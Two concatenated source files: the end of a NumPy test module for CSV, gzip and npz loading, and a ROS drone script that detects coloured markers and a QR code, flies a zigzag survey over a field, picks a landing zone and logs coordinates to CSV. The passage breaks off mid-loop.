data = StringIO('A,B\n0,1\n2,N/A')
test = np.recfromcsv(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
#
data = StringIO('A,B\n0,1\n2,3')
test = np.recfromcsv(data, missing_values='N/A',)
control = np.array([(0, 1), (2, 3)],
dtype=[('a', np.int), ('b', np.int)])
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
def test_gft_using_filename(self):
# Test that we can load data from a filename as well as a file object
wanted = np.arange(6).reshape((2,3))
if sys.version_info[0] >= 3:
# python 3k is known to fail for '\r'
linesep = ('\n', '\r\n')
else:
linesep = ('\n', '\r\n', '\r')
for sep in linesep:
data = '0 1 2' + sep + '3 4 5'
f, name = mkstemp()
# We can't use NamedTemporaryFile on windows, because we cannot
# reopen the file.
try:
os.write(f, asbytes(data))
assert_array_equal(np.genfromtxt(name), wanted)
finally:
os.close(f)
os.unlink(name)
def test_gft_using_generator(self):
def count():
for i in range(10):
yield asbytes("%d" % i)
res = np.genfromtxt(count())
assert_array_equal(res, np.arange(10))
def test_gzip_load():
a = np.random.random((5, 5))
s = StringIO()
f = gzip.GzipFile(fileobj=s, mode="w")
np.save(f, a)
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.load(f), a)
def test_gzip_loadtxt():
# Thanks to another windows brokeness, we can't use
# NamedTemporaryFile: a file created from this function cannot be
# reopened by another open call. So we first put the gzipped string
# of the test reference array, write it to a securely opened file,
# which is then read from by the loadtxt function
s = StringIO()
g = gzip.GzipFile(fileobj=s, mode='w')
g.write(asbytes('1 2 3\n'))
g.close()
s.seek(0)
f, name = mkstemp(suffix='.gz')
try:
os.write(f, s.read())
s.close()
assert_array_equal(np.loadtxt(name), [1, 2, 3])
finally:
os.close(f)
os.unlink(name)
def test_gzip_loadtxt_from_string():
s = StringIO()
f = gzip.GzipFile(fileobj=s, mode="w")
f.write(asbytes('1 2 3\n'))
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.loadtxt(f), [1, 2, 3])
def test_npzfile_dict():
s = StringIO()
x = np.zeros((3, 3))
y = np.zeros((3, 3))
np.savez(s, x=x, y=y)
s.seek(0)
z = np.load(s)
assert_('x' in z)
assert_('y' in z)
assert_('x' in z.keys())
assert_('y' in z.keys())
for f, a in z.iteritems():
assert_(f in ['x', 'y'])
assert_equal(a.shape, (3, 3))
assert_(len(z.items()) == 2)
for f in z:
assert_(f in ['x', 'y'])
assert_('x' in list(z.iterkeys()))
if __name__ == "__main__":
run_module_suite()
|
ALL_IN_ONE_C_2.py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# Импорт библиотек
import math
import rospy
import time
from sensor_msgs.msg import Image
from sensor_msgs.msg import CameraInfo
from std_msgs.msg import Int32, Header, Float32
from cv_bridge import CvBridge, CvBridgeError
import cv2
import numpy as np
from threading import Thread
# import tf2
import tf
import tf2_ros
# import tf2_geometry_msgs
import geometry_msgs
import math
# geometry_msgs.msg.
# tf.transformations.
from nav_msgs.msg import Odometry
from std_msgs.msg import Float32, Int16, Bool
from geometry_msgs.msg import Point, Pose, Quaternion, Twist, Vector3, TransformStamped, PoseStamped
import tf.transformations as t
# from l22_aero_vision.msg import ColorRectMarker, ColorRectMarkerArray
# import tf
try:
from clover import srv
except:
from clever import srv
from std_srvs.srv import Trigger
from mavros_msgs.srv import CommandBool
from std_msgs.msg import String
from pyzbar import pyzbar
import sys
import threading
import os
from mavros_msgs.srv import CommandBool
def orientation_from_euler(roll, pitch, yaw):
q = t.quaternion_from_euler(roll, pitch, yaw)
return orientation_from_quaternion(q)
def euler_from_orientation(o):
q = quaternion_from_orientation(o)
return t.euler_from_quaternion(q)
def orientation_from_quaternion(q):
return Quaternion(*q)
def quaternion_from_orientation(o):
return o.x, o.y, o.z, o.w
TRANSFORM_TIMEOUT = 1
def transform_xyz_yaw(x, y, z, yaw, framefrom, frameto, listener):
p = PoseStamped()
# Pose().fr
p.header.frame_id = framefrom
p.pose.position.x = x
p.pose.position.y = y
p.pose.position.z = z
# p.pose.pse
p.pose.orientation = orientation_from_euler(0, 0, yaw)
# p.pose
# p.pose.orientation
# print "Returning [%s + %s = %s]"%(req.a, req.b, (req.a + req.b))
# pose_local = tf2_geometry_msgs.do_transform_point(p, get_transformation(framefrom, frameto, tf_buffer))
pose_local = listener.transformPose(frameto, p)
target_x = pose_local.pose.position.x
target_y = pose_local.pose.position.y
target_z = pose_local.pose.position.z
target_yaw = euler_from_orientation(pose_local.pose.orientation)[2]
return target_x, target_y, target_z, target_yaw
class VideoRecorder:
def __init__(self):
self.fourcc = cv2.VideoWriter_fourcc(*'XVID')
if not os.path.exists(os.environ['HOME']+"/L22_AERO_LOG"):
os.mkdir(os.environ['HOME']+"/L22_AERO_LOG")
self.UPDATE_RATE = 5
self.video_writer = cv2.VideoWriter(os.environ['HOME']+"/L22_AERO_LOG/LOG_IMAGE_RAW_real_drone.avi", self.fourcc, self.UPDATE_RATE, (320, 240))
self.image_raw_frame = np.zeros((240, 320, 3), dtype="uint8")
self.bridge = CvBridge()
self.image_sub = rospy.Subscriber("/main_camera/image_raw_throttled", Image, self.img_clb)
self.stopped = False
def img_clb(self, msg):
self.image_raw_frame = self.bridge.imgmsg_to_cv2(msg, "bgr8")
def start(self):
Thread(target=self.videowriter, args=()).start()
return self
def videowriter(self):
try:
r = rospy.Rate(self.UPDATE_RATE)
while not self.stopped:
self.video_writer.write(self.image_raw_frame)
r.sleep()
except KeyboardInterrupt:
self.video_writer.release()
self.stopped = True
def stop(self):
self.stopped = True
self.video_writer.release()
result_GLOBAL = [] # ColorRectMarker_p
circles_GLOBAL = [] # ColorRectMarker_p
rospy.init_node('l22_aero_color_node', anonymous=True)
bridge = CvBridge()
# markers_arr_pub = rospy.Publisher("/l22_aero_color/markers", ColorRectMarkerArray)
# circles_arr_pub = rospy.Publisher("/l22_aero_color/circles", ColorRectMarkerArray)
image_pub = rospy.Publisher("/l22_aero_color/debug_img", Image)
# Параметры цвета маркеров
# colors_p_hsv = {
# 'blue': (np.array([103, 47, 65]), np.array([150, 187, 172])),
# 'green': (np.array([28, 44, 20]), np.array([100, 255, 255])),
# 'yellow': (np.array([14, 100, 104]), np.array([29, 255, 255])),
# 'red': (np.array([151, 134, 99]), np.array([255, 243, 252])),
# 'brown': (np.array([6, 86, 99]), np.array([255, 243, 252]))
# }
'''
colors_p_hsv = {
'blue': (np.array([72, 121, 67]), np.array([180, 255, 255])),
'green': (np.array([43, 121, 67]), np.array([116, 255, 255])),
'yellow': (np.array([15, 121, 67]), np.array([37, 255, 255])),
'red': (np.array([0, 121, 67]), np.array([5, 255, 255])),
'brown': (np.array([5, 121, 67]), np.array([24, 255, 255]))
}
'''
colors_p_hsv = {
'green': (np.array([71, 86, 22]), np.array([88, 255, 255])),
'yellow': (np.array([13, 63, 74]), np.array([65, 255, 255])),
'blue': (np.array([94, 88, 63]), np.array([134, 255, 255])),
'red': (np.array([133, 94, 62]), np.array([241, 255, 255])),
'brown': (np.array([0, 111, 98]), np.array([12, 255, 255])),
}
colors_p_rgb = {
"yellow": [0, 200, 200],
"red": [0, 0, 255],
"blue": [255, 0, 0],
"green": [0, 255, 0],
"brown": [42, 42, 165]
}
# Формат вывода
type_mapping_1 = {
'blue': 'N2_water',
'green': 'N2_pastures',
'yellow': 'N2_seed',
'red': 'N2_potato',
'brown': 'N2_soil'
}
# # Размеры цветных маркеров
MARKER_SIDE1_SIZE = 0.35 # in m
MARKER_SIDE2_SIZE = 0.35 # in m
CIRCLE_R = 0.2
# Размеры цветных маркеров
# MARKER_SIDE1_SIZE = 0.3 # in m
# MARKER_SIDE2_SIZE = 0.3 # in m
# CIRCLE_R = 0.15
OBJ_S_THRESH = 350
OFFSET = [61, 35] # pixels
objectPoint = np.array([(-MARKER_SIDE1_SIZE / 2, -MARKER_SIDE2_SIZE / 2, 0), (MARKER_SIDE1_SIZE / 2, -MARKER_SIDE2_SIZE / 2, 0),
(MARKER_SIDE1_SIZE / 2, MARKER_SIDE2_SIZE / 2, 0), (-MARKER_SIDE1_SIZE / 2, MARKER_SIDE2_SIZE / 2, 0)])
objectPoint_circles = np.array([(-CIRCLE_R, -CIRCLE_R, 0), (CIRCLE_R, -CIRCLE_R, 0),
(CIRCLE_R, CIRCLE_R, 0), (-CIRCLE_R, CIRCLE_R, 0)])
# print("objectPoint shape:", objectPoint.shape)
class ColorRect:
def __init__(self, cx_img=0, cy_img=0, color="none", points_img=[]):
self.cx_img = cx_img
self.cy_img = cy_img
self.color = color
self.points_img = points_img
class ColorRectMarker_p:
def __init__(self, cx_img=0, cy_img=0, color="none", points_img=[], cx_cam=0, cy_cam=0, cz_cam=0):
self.cx_img = cx_img
self.cy_img = cy_img
self.color = color
self.points_img = points_img
self.cx_cam = cx_cam
self.cy_cam = cy_cam
self.cz_cam = cz_cam
def fromColorRect(self, cr):
self.cx_img = cr.cx_img
self.cy_img = cr.cy_img
self.color = cr.color
self.points_img = cr.points_img
return self
def toMsg(self):
return ColorRectMarker(color=self.color, cx_img=self.cx_img, cy_img=self.cy_img, cx_cam=self.cx_cam, cy_cam=self.cy_cam, cz_cam=self.cz_cam, size1=MARKER_SIDE1_SIZE, size2=MARKER_SIDE2_SIZE)
def __str__(self):
return "color: {}\n coords: {} {} {}".format(self.color, str(self.cx_cam), str(self.cy_cam), str(self.cz_cam))
# Параметры камеры
cameraMatrix = np.zeros((3, 3), dtype="float64")
distCoeffs = np.zeros((8, 1), dtype="float64")
has_cam_info = False
def camera_info_clb(msg):
global has_cam_info, cameraMatrix, distCoeffs
if not has_cam_info:
# конвертация параметров камеры из формата ROS в OpenCV
has_cam_info = True
distCoeffs = np.array(msg.D, dtype="float64")
cameraMatrix = np.reshape(np.array(msg.K, dtype="float64"), (3, 3))
def get_color_objs(image, hsv, color_params):
"""
Обработка изображения для определенного цвета
"""
debug_out = image.copy()
mask = cv2.inRange(hsv, color_params[0], color_params[1])
if len(color_params) == 4:
mask = cv2.bitwise_or(mask, cv2.inRange(hsv, color_params[2], color_params[3]))
# thresh = cv2.threshold(mask, 80, 255, cv2.THRESH_BINARY)[1]
cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL,
cv2.CHAIN_APPROX_SIMPLE)[-2]
cnts = [i for i in cnts if cv2.contourArea(i) > OBJ_S_THRESH]
# obj_count = len(cnts)
debug_out = cv2.bitwise_and(image, image, mask=mask)
return cnts, debug_out
def img_colision_check(pnts, offset, image_shape=(240, 320, 3)):
minx1 = pnts[:, 0].min() > offset[0]
miny1 = pnts[:, 1].min() > offset[1]
minx2 = image_shape[1] - pnts[:, 0].max() > offset[0]
miny2 = image_shape[0] - pnts[:, 1].max() > offset[1]
return minx1 and minx2 and miny1 and miny2
# def get_color_rects(cnts, color_name, image_shape=(240, 320, 3)):
# """
# Фильтрация контуров
# """
# result = []
# for cnt in cnts:
# approx = cv2.approxPolyDP(cnt, 0.02 * cv2.arcLength(cnt, True), True)
# rect = cv2.minAreaRect(cnt)
# # print(rect)
# if len(approx) == 4 and abs(1 - rect[1][0] / (rect[1][1] + 1e-7)) < 0.2:
# points_img = np.array([np.array(p[0]) for p in approx]) # ?
# if img_colision_check(points_img, OFFSET,image_shape=image_shape):
# M = cv2.moments(cnt)
# cX = int((M["m10"] / (M["m00"] + 1e-7)))
# cY = int((M["m01"] / (M["m00"] + 1e-7)))
# result.append(ColorRect(color=color_name, cx_img=cX, cy_img=cY, points_img=points_img))
# return result
def get_color_rects_circles(cnts, color_name, image_shape=(240, 320, 3)):
global OFFSET
"""
Фильтрация контуров
"""
result = []
circles = []
for cnt in cnts:
approx = cv2.approxPolyDP(cnt, 0.04 * cv2.arcLength(cnt, True), True)
rect = cv2.minAreaRect(cnt)
box = cv2.boxPoints(rect)
box = np.int0(box)
box_area = cv2.contourArea(box) + 1e-7
c_area = cv2.contourArea(cnt) + 1e-7
# print(rect)
if len(approx) == 4 and abs(1 - rect[1][0] / (rect[1][1] + 1e-7)) < 0.15 and abs(c_area / box_area) > 0.85:
points_img = np.array([np.array(p[0]) for p in approx]) # ?
# points_img = box
if img_colision_check(points_img, OFFSET, image_shape=image_shape):
M = cv2.moments(cnt)
cX = int((M["m10"] / (M["m00"] + 1e-7)))
cY = int((M["m01"] / (M["m00"] + 1e-7)))
result.append(ColorRect(color=color_name, cx_img=cX, cy_img=cY, points_img=points_img))
elif len(approx) > 4 and abs(1 - rect[1][0] / (rect[1][1] + 1e-7)) < 0.2 and color_name in ["green", "yellow", "blue"] and abs(c_area / box_area) < 0.8:
# elp = cv2.fitEllipse(cnt)
points_img = box
if img_colision_check(points_img, OFFSET, image_shape=image_shape):
M = cv2.moments(cnt)
cX = int((M["m10"] / (M["m00"] + 1e-7)))
cY = int((M["m01"] / (M["m00"] + 1e-7)))
circles.append(ColorRect(color=color_name, cx_img=cX, cy_img=cY, points_img=points_img))
return result, circles
def draw_cnts_colors(image, cnts, color_name, t = 1):
"""
Отрисовка контуров на итоговом изображении
"""
for cnt in cnts:
# M = cv2.moments(cnt)
# cX = int((M["m10"] / (M["m00"] + 1e-7)))
# cY = int((M["m01"] / (M["m00"] + 1e-7)))
cv2.drawContours(image, [cnt], -1, colors_p_rgb[color_name], 2)
return image
def draw_color_rect(image, cr, t = 1):
"""
Отрисовка результата распознования маркеров
"""
for i, p in enumerate(cr.points_img):
cv2.circle(image, tuple(p), 5, ((i+1)*(255//4), (i+1)*(255//4), (i+1)*(255//4)), -1)
cv2.circle(image, (cr.cx_img, cr.cy_img), 5, colors_p_rgb[cr.color], -1)
if t:
cv2.rectangle(image,(cr.cx_img,cr.cy_img-15),(cr.cx_img+75,cr.cy_img+5),(255,255,255),-1)
cv2.putText(image, type_mapping_1[cr.color], (cr.cx_img, cr.cy_img),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, colors_p_rgb[cr.color], 1, cv2.LINE_AA)
else:
cv2.putText(image, cr.color, (cr.cx_img, cr.cy_img),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, colors_p_rgb[cr.color], 2, cv2.LINE_AA)
return image
def draw_color_circle(image, cr, t = 1):
"""
Отрисовка результата распознования зон посадки
"""
for i, p in enumerate(cr.points_img):
cv2.circle(image, tuple(p), 5, ((i+1)*(255//4), (i+1)*(255//4), (i+1)*(255//4)), -1)
cv2.circle(image, (cr.cx_img, cr.cy_img), 5, colors_p_rgb[cr.color], -1)
if t:
cv2.rectangle(image,(cr.cx_img,cr.cy_img-15),(cr.cx_img+75,cr.cy_img+5),(255,255,255),-1)
cv2.putText(image, "LANDING_ZONE", (cr.cx_img, cr.cy_img),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, colors_p_rgb[cr.color], 1, cv2.LINE_AA)
else:
cv2.putText(image, "LANDING_ZONE", (cr.cx_img, cr.cy_img),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, colors_p_rgb[cr.color], 2, cv2.LINE_AA)
return image
def get_rect_pose(rect, op, cM, dC):
"""
Расчет позиции маркера относительно камеры
"""
# print("shapes", op.shape, rect.points_img.shape)
retval, rvec, tvec = cv2.solvePnP(np.array(op, dtype="float64"), np.array(rect.points_img, dtype="float64"), cM, dC)
return ColorRectMarker_p(cx_cam=tvec[0][0], cy_cam=tvec[1][0], cz_cam=tvec[2][0]).fromColorRect(rect)
def img_clb(msg):
global has_cam_info, cameraMatrix, distCoeffs, result_GLOBAL, circles_GLOBAL
image = bridge.imgmsg_to_cv2(msg, "bgr8")
# print(image.shape)
# image[:, :, 2] = np.clip(image[:, :, 2]*0.7, 0, 255)
# image[:, :, 1] = np.clip(image[:, :, 1]*1.2, 0, 255)
# image[:, :, 0] = np.clip(image[:, :, 0]*1.5, 0, 255)
out = image.copy()
hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
result_in_img_frame = [] # ColorRect
circles_in_img_frame = []
for c_name in ["blue", "yellow", "green", "red", "brown"]:
cnts, d_img = get_color_objs(image, hsv, colors_p_hsv[c_name])
draw_cnts_colors(out, cnts, c_name)
# result_in_img_frame += get_color_rects(cnts, c_name)
k = get_color_rects_circles(cnts, c_name)
result_in_img_frame += k[0]
circles_in_img_frame += k[1]
for i in result_in_img_frame:
draw_color_rect(out, i)
for i in circles_in_img_frame:
draw_color_circle(out, i)
# cv2.imshow("out", out)
result_GLOBAL = []
circles_GLOBAL = []
if has_cam_info:
for r in result_in_img_frame:
result_GLOBAL.append(get_rect_pose(r, objectPoint, cameraMatrix, distCoeffs))
for c in circles_in_img_frame:
circles_GLOBAL.append(get_rect_pose(c, objectPoint_circles, cameraMatrix, distCoeffs))
# if len(result) > 0:
# print("RES: \n " + "\n ".join(map(str, result)))
# if len(circles) > 0:
# print("circles: \n " + "\n ".join(map(str, circles)))
# cv2.waitKey(1)
# Отправка результатов распознования
# markers_arr_pub.publish(ColorRectMarkerArray(header=Header(stamp=rospy.Time.now(), frame_id="color_marker_cam"), markers=[r.toMsg() for r in result]))
# circles_arr_pub.publish(ColorRectMarkerArray(header=Header(stamp=rospy.Time.now(), frame_id="color_marker_cam"), markers=[r.toMsg() for r in circles]))
image_pub.publish(bridge.cv2_to_imgmsg(out, "bgr8"))
image_sub = rospy.Subscriber(
"/main_camera/image_raw_throttled", Image, img_clb)
camera_info_sub = rospy.Subscriber(
"/main_camera/camera_info", CameraInfo, camera_info_clb)
# rospy.spin()
########################################################################
########################################################################
########################################################################
########################################################################
########################################################################
########################################################################
########################################################################
########################################################################
########################################################################
########################################################################
########################################################################
########################################################################
########################################################################
########################################################################
########################################################################
########################################################################
Z_TOL = 0.5
TOLERANCE_COORDS = 0.4 #in meters
COORDS_UPDATE_RATE = 1
# ARUCO_TELEM_RATE = 5
# Словари для координат
coordinates = {
'water': [],
'pastures': [],
'seed': [],
'potato': [],
'soil': [],
'water_land': [],
'seed_land': [],
'pastures_land': []
}
type_mapping = {
'blue': 'water',
'green': 'pastures',
'yellow': 'seed',
'red': 'potato',
'brown': 'soil'
}
circle_type_mapping = {
'seed': 'seed_land',
'pastures': 'pastures_land',
'water': 'water_land',
'blue': 'water_land',
'green': 'pastures_land',
'yellow': 'seed_land'
}
get_telemetry = rospy.ServiceProxy('get_telemetry', srv.GetTelemetry)
navigate = rospy.ServiceProxy('navigate', srv.Navigate)
navigate_global = rospy.ServiceProxy('navigate_global', srv.NavigateGlobal)
set_position = rospy.ServiceProxy('set_position', srv.SetPosition)
set_velocity = rospy.ServiceProxy('set_velocity', srv.SetVelocity)
set_attitude = rospy.ServiceProxy('set_attitude', srv.SetAttitude)
set_rates = rospy.ServiceProxy('set_rates', srv.SetRates)
land_serv = rospy.ServiceProxy('land', Trigger)
arming = rospy.ServiceProxy('mavros/cmd/arming', CommandBool)
nav_broadcaster = tf.TransformBroadcaster()
# tf_buffer = tf2_ros.Buffer()
# tf_listener = tf2_ros.TransformListener(tf_buffer)
listener = tf.TransformListener()
#####
Z = 0
def navigate_aruco(x=0, y=0, z=0, yaw=float('nan'), speed=0.4, floor=False):
'''
Фукнция для полета до точки без ожидания долета до нее
'''
return navigate(x=x, y=y, z=z, yaw=yaw, speed=speed, frame_id='aruco_map')
def get_telemetry_aruco():
'''
Функция для получения телеметрии
'''
telem = get_telemetry(frame_id="aruco_map")
# Z = telem.z
return telem
def takeoff(z):
'''
Функция для взлета
'''
telem = get_telemetry_aruco()
navigate(z=z, speed=0.3, frame_id="body", auto_arm=True)
rospy.sleep(2)
navigate_aruco(x=telem.x, y=telem.y, z=z, speed=0.4, floor=True)
def navigate_wait(x, y, z, yaw=float('nan'), speed=0.2, tolerance=0.13):
'''
Фукнция для полета до точки с ожиданием долета до нее
'''
navigate_aruco(x=x, y=y, z=z, yaw=yaw, speed=speed)
while not rospy.is_shutdown():
telem = get_telemetry(frame_id="navigate_target")
# print(telem.x, telem.y, telem.z)
if math.sqrt(telem.x ** 2 + telem.y ** 2 + telem.z ** 2) < tolerance:
break
rospy.sleep(0.2)
def land():
'''
Фунцкия для посадки
'''
land_serv()
rospy.sleep(0.813)
arming(False)
class ColorRectMarkerMap:
def __init__(self, cx_map=0, cy_map=0, cz_map=0, cx_img=0, cy_img=0, color="none"):
self.cx_map = cx_map
self.cy_map = cy_map
self.cz_map = cz_map
self.cx_img = cx_img
self.cy_img = cy_img
self.color = color
def __str__(self):
return "color: {}\n coords map: {} {} {}".format(self.color, str(self.cx_map), str(self.cy_map), str(self.cz_map))
class Recognition:
def __init__(self):
'''
Инициализация переменных
Создание подписчика топика main_camera/image_raw_throttled, который отправляет его в image_callback()
Создание топика, который публикует изображение
'''
self.barcodeData = None
self.bridge = CvBridge()
self.cv_image = np.zeros((240, 320, 3), dtype="uint8")
self.image_sub = rospy.Subscriber('/main_camera/image_raw_throttled', Image, self.image_callback)
self.qr_pub = rospy.Publisher('/qr_debug', Image, queue_size=1)
# self.coords_sub = sub = rospy.Subscriber("/l22_aero_color/markers", ColorRectMarkerArray, self.markers_arr_clb)
# self.circles_sub = rospy.Subscriber("/l22_aero_color/circles", ColorRectMarkerArray, self.circles_arr_clb)
self.result = []
self.circles = []
# self.coords_thread = threading.Thread(target=self.coords_thread_func)
# self.coords_thread.daemon = True
# self.coords_thread.start()
def transform_marker(self, marker, frame_to="aruco_map"):# -> ColorRectMarkerMap:
cx_map = 0
cy_map = 0
cz_map = 0
try:
cx_map, cy_map, cz_map, _ = transform_xyz_yaw(
marker.cx_cam, marker.cy_cam, marker.cz_cam, 0, "main_camera_optical", frame_to, listener)
except (tf.LookupException, tf.ConnectivityException):
print("ARUCOARUCOARUCO")
return ColorRectMarkerMap(color=marker.color, cx_map=cx_map, cy_map=cy_map, cz_map=cz_map)
def markers_arr_clb(self, msg):
'''
Функция для парсинга координат цветных маркеров
'''
# self.result = []
for marker in msg:
self.result.append(self.transform_marker(marker, frame_to="aruco_map"))
def circles_arr_clb(self, msg):
'''
Функция для парсинга координат точек для посадки из топика
'''
# self.circles = []
for marker in msg:
self.circles.append(self.transform_marker(marker, frame_to="aruco_map"))
def image_callback(self, data):
'''
Функция для парсинга изображения из топика
'''
self.cv_image = cv2.resize(self.bridge.imgmsg_to_cv2(data, 'bgr8'), (320, 240))
def most_frequent(self, arr):
'''
Функция для определения значения, который встречается наибольшее количество раз в массиве
'''
return max(set(arr), key = arr.count)
def distance(self, coord1, coord2):
'''
Функция для определения евклидова расстояния
'''
return ((coord1[0] - coord2[0])**2 + (coord1[1] - coord2[1])**2)**0.5
def average(self, coord1, coord2):
'''
Функция для определения средней точки
'''
return ((coord1[0] + coord2[0])/2, (coord1[1] + coord2[1])/2)
def coordsFunc(self):
global result_GLOBAL, circles_GLOBAL, coordinates
# global Z
'''
Функция для усреднения координат цветных маркеров
'''
self.markers_arr_clb(result_GLOBAL)
self.circles_arr_clb(circles_GLOBAL)
print("GLOBAL",result_GLOBAL, circles_GLOBAL)
# global coordinates
# Z = get_telemetry_aruco().z
for i in range(len(self.result)):
if self.result[i].color not in coordinates:
color = type_mapping[self.result[i].color]
else:
color = self.result[i].color
# if (self.result[i].cz_map - Z) < Z_TOL:
tempCoords = (self.result[i].cx_map, self.result[i].cy_map)
if tempCoords[0] < -1.5 or tempCoords[1] < -1.5: continue
if len(coordinates[color]) == 0:
coordinates[color].append(tempCoords)
else:
for j in range(len(coordinates[color])):
if self.distance(coordinates[color][j], tempCoords) <= TOLERANCE_COORDS:
coordinates[color][j] = self.average(tempCoords, coordinates[color][j])
break
else:
coordinates[color].append(tempCoords)
self.result = []
for i in range(len(self.circles)):
if self.circles[i].color not in coordinates:
color = circle_type_mapping[self.circles[i].color]
else:
color = self.circles[i].color
tempCoords = [self.circles[i].cx_map, self.circles[i].cy_map]#####################################
if tempCoords[0] < -1 or tempCoords[1] < -1: continue #DELETE IF NEEDED!
if len(coordinates[color]) == 0:
coordinates[color].append(list(tempCoords) + [1])##################################################
else:
for j in range(len(coordinates[color])):
if self.distance(coordinates[color][j], tempCoords) <= TOLERANCE_COORDS:
coordinates[color][j] = list(self.average(tempCoords, coordinates[color][j])) + [coordinates[color][j][2] + 1] ################################
break
else:
coordinates[color].append(list(tempCoords) + [1]) ###############################################################
self.circles = []
def coords_thread_func(self):
r = rospy.Rate(COORDS_UPDATE_RATE)
while True:
self.coordsFunc()
r.sleep()
def waitDataQR(self):
'''
Функция для распознавания QR-кодов
'''
gray = cv2.cvtColor(self.cv_image, cv2.COLOR_BGR2GRAY)
barcodes = pyzbar.decode(gray)
for barcode in barcodes:
(x, y, w, h) = barcode.rect
self.barcodeData = barcode.data.decode("utf-8")
xc = x + w/2
yc = y + h/2
self.cv_image = cv2.circle(self.cv_image, (int(xc), int(yc)), 15, (0, 0, 0), 30)
self.qr_pub.publish(self.bridge.cv2_to_imgmsg(self.cv_image, 'bgr8'))
return self.barcodeData
# Создание объекта класса для распознавания
rc = Recognition()
vr = VideoRecorder().start()
z = 1.5
FIELD_LENGTH_X = 2.83 #in meters
FIELD_LENGTH_Y = 2.65 #in meters
deltaX = 0.65 #in meters
deltaY = 0.25 #in meters
betweenX = 3
LANDING_B = 5
i, count = 0.1, 0
points = []
def getAdditionalPoints(coord1, coord2, parts, xyz=0):
'''
Создание дополнительных точек между двумя данными
'''
if xyz:
return zip(np.linspace(coord1[0], coord2[0], parts + 1), np.linspace(coord1[1], coord2[1], parts + 1), np.linspace(coord1[2], coord2[2], parts + 1))
return zip(np.linspace(coord1[0], coord2[0], parts + 1), np.linspace(coord1[1], coord2[1], parts + 1))
# Создание массива с точками для дальнейшего полета по полю (полет по зиг-загу)
while i <= FIELD_LENGTH_X:
j = 0.1
while j <= FIELD_LENGTH_Y:
if count % 2 == 0:
points.append((i, j))
else:
points.append((i, FIELD_LENGTH_Y-j))
j += deltaY
d = j - FIELD_LENGTH_Y
if d > 0: j -= d
if count % 2 == 0 and i != len(points) - 1:
points += list(getAdditionalPoints((i, j), (i + deltaX, j), betweenX))
elif count % 2 != 0 and i != len(points) - 1:
points += list(getAdditionalPoints((i, FIELD_LENGTH_Y - j), (i + deltaX, FIELD_LENGTH_Y-j), betweenX))
i += deltaX
count += 1
if points[-1][0] > FIELD_LENGTH_X:
points = points[:-3]
# взлет
takeoff(z)
navigate_wait(0.15, 0.15, 1.2)
# распознавание qr-кода
qrs = []
qr = 'seed'
zLower = 1.05
# полет вокруг qr-кода для улучшения распознавания
for (x_new, y_new) in [(0.12, 0.15), (0.18, 0.05), (0.20, 0.05), (0.23, 0.2), (0.2, 0.25), (0.15, 0.15)]:
navigate_wait(x_new, y_new, zLower)
qrs.append(rc.waitDataQR())
rospy.sleep(0.55)
if len(qrs) > 0:
qr = rc.most_frequent(qrs)
if qr == None:
qr = 'seed'
print(".....")
print(qr)
navigate_wait(0.15, 0.1, z)
# полет по полю
for point in points:
'''
if points.index(point) == int(len(points) // 4):
break
'''
navigate_wait(x=point[0], y=point[1], z=z, speed=0.4, yaw=3.14/2.0)
rospy.sleep(0.3)
rc.coordsFunc()
rospy.sleep(0.3)
print("739")
# for (x_new, y_new) in [(0.75*FIELD_LENGTH_X, 0.75*FIELD_LENGTH_Y), (0.75*FIELD_LENGTH_X, FIELD_LENGTH_Y/4), (FIELD_LENGTH_X/4, FIELD_LENGTH_Y/4), (FIELD_LENGTH_X/4, 0.75*FIELD_LENGTH_Y)]:
# navigate_wait(x_new, y_new, 2.1)
# rospy.sleep(1)
print(coordinates[circle_type_mapping[qr]])
# определение координат для посадки
if len(coordinates[circle_type_mapping[qr]]) == 0:
landCoordinate = (1, 1)
print("1, 1")
else:
landCoordinate = max(coordinates[circle_type_mapping[qr]], key=lambda x: x[2])[:2] ###############################################################
print("landCoordinate", landCoordinate)
print("746")
# посадка
telem = get_telemetry_aruco()
for (x_new, y_new) in list(getAdditionalPoints((telem.x, telem.y), landCoordinate, 3)):
navigate_wait(x_new, y_new, z)
navigate_wait(landCoordinate[0], landCoordinate[1], z)
print("749")
print('WRITING CSV WITH COORDINATES')
print(coordinates)
# Создание csv файла с координатами
if not os.path.exists(os.environ['HOME']+"/L22_AERO_LOG"):
os.mkdir(os.environ['HOME']+"/L22_AERO_LOG")
import csv
# from time import time
with open(os.environ['HOME']+"/L22_AERO_LOG/" + 'L22_AERO_result.csv', 'w') as f:
writer = csv.writer(f)
writer.writerow(["Sector", "Type", "x (cm)", "y (cm)"])
arr = []
for key in coordinates:
if key in ['water_land', 'seed_land', 'pastures_land']: continue
for j in range(len(coordinates[key])):
x = coordinates[key][j][0]
y = coordinates[key][j][1]
if x < FIELD_LENGTH_X/2 and y < FIELD_LENGTH_Y/2:
arr.append(['C', key, x*100, y*100])
elif x < FIELD_LENGTH_X/2 and y >= FIELD_LENGTH_Y/2:
arr.append(['A', key, x*100, y*100])
elif x >= FIELD_LENGTH_X/2 and y < FIELD_LENGTH_Y/2:
arr.append(['D', key, x*100, y*100])
elif x >= FIELD_LENGTH_X/2 and y >= FIELD_LENGTH_Y/2:
arr.append(['B', key, x*100, y*100])
arr.sort(key = lambda x: x[0])
writer.writerows(arr)
writer.writerow(['','','',''])
writer.writerow(['','','',''])
writer.writerow(['','','',''])
writer.writerow(['','','',''])
writer.writerow(['TIME:', str(time.time()), 'TIME:', str(time.time())])
print('CSV SAVED')
telem = get_telemetry_aruco()
last = None
Z_LAND = 0.86
landingPath = list(getAdditionalPoints((landCoordinate[0], landCoordinate[1], z), (landCoordinate[0], landCoordinate[1], Z_LAND), 4, xyz = 1))
print(landingPath)
j = 0
print("756")
markerType = circle_type_mapping[qr]
while j < len(landingPath):
print(i, j)
